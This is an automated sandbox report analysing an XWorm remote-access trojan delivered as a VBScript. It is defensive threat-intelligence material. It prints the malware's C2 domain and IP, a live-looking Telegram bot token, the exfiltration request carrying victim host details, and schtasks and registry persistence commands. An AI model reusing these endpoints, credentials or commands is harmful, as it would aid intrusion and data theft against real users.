Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA-injazfe-10424.vbs

Overview

General Information

Sample name:SOA-injazfe-10424.vbs
Analysis ID:1526836
MD5:d1d114a2cb6d4a5fcc20e0db06755948
SHA1:eafdcba5d2d41934ae19628ac35675f7fce924c1
SHA256:f71d04f863721491823b5ed2b83d2f30d67084025bf7ea9fc52c615ba0fd3040
Tags:Formbookvbsuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Potential malicious VBS script found (has network functionality)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WindowsApp.exe (PID: 1204 cmdline: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
      • schtasks.exe (PID: 3452 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • task.exe (PID: 7172 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7480 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7912 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["isika.ddns.net"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x12cc:$s6: VirtualBox
        • 0x125a:$s8: Win32_ComputerSystem
        • 0x1ac0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1b14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1ba4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1798:$cnc4: POST / HTTP/1.1
        00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 31 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ProcessId: 6296, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\task.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ProcessId: 1204, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\task
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ProcessId: 1204, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ParentProcessId: 1204, ParentProcessName: WindowsApp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", ProcessId: 3452, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ParentProcessId: 1204, ParentProcessName: WindowsApp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", ProcessId: 3452, ProcessName: schtasks.exe
            Sigma detected: Use Short Name Path in Command Line
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , ProcessId: 1204, ProcessName: WindowsApp.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ProcessId: 6296, ProcessName: wscript.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-06T16:45:11.941778+020028536851A Network Trojan was detected192.168.2.749701149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-06T16:46:25.707078+020028531931Malware Command and Control Activity Detected192.168.2.74962145.88.91.1477000TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SOA-injazfe-10424.vbsAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Roaming\task.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Found malware configuration
            Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["isika.ddns.net"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018"}
            Source: WindowsApp.exe.1204.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\task.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: Binary string: .pdb} source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_b9 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbH source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Xml.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1&0 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbra source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@w^ source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdbp source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: *Win32_OperatingSystemblib.pdb A source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbwA source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: 0C:\Windows\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdbq source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C130000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C197000.00000004.00000020.00020000.00000000.sdmp, WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Management.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbVa} source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: msymbols\dll\mscorlib.pdbpdb` source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: orlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 4x nop then dec eax7_2_00007FFAAC4E7EDD
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 4x nop then dec eax7_2_00007FFAAC4E3799
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 4x nop then dec eax7_2_00007FFAAC4E9D77
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 4x nop then cmp dword ptr [ebp-58h], 00000000h7_2_00007FFAAC4E07E8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 4x nop then cmp dword ptr [ebp-58h], 00000000h7_2_00007FFAAC4E0235

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49494 -> 45.88.91.147:7000
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49621 -> 45.88.91.147:7000
            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49701 -> 149.154.167.220:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: isika.ddns.net
            Potential malicious VBS script found (has network functionality)
            Source: Initial file: binaryStream.SaveToFile executablePath, 2 ' Overwrite if file exists
            Uses dynamic DNS services
            Source: unknownDNS query: name: isika.ddns.net
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.7:49712 -> 45.88.91.147:7000
            Source: global trafficHTTP traffic detected: GET /bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: isika.ddns.net
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
            Source: task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=70620
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49701 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: 12.2.task.exe.12fce598.5.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 12.2.task.exe.13f0000.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 12.2.task.exe.12f80918.3.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 16.2.task.exe.122f0908.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 16.2.task.exe.12317740.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            PE file contains section with special chars
            Source: WindowsApp.exe.2.drStatic PE information: section name: dCocB{
            Source: task.exe.7.drStatic PE information: section name: dCocB{
            PE file has nameless sections
            Source: WindowsApp.exe.2.drStatic PE information: section name:
            Source: task.exe.7.drStatic PE information: section name:
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DEDF67_2_00007FFAAC4DEDF6
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DDF5A7_2_00007FFAAC4DDF5A
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DF3B27_2_00007FFAAC4DF3B2
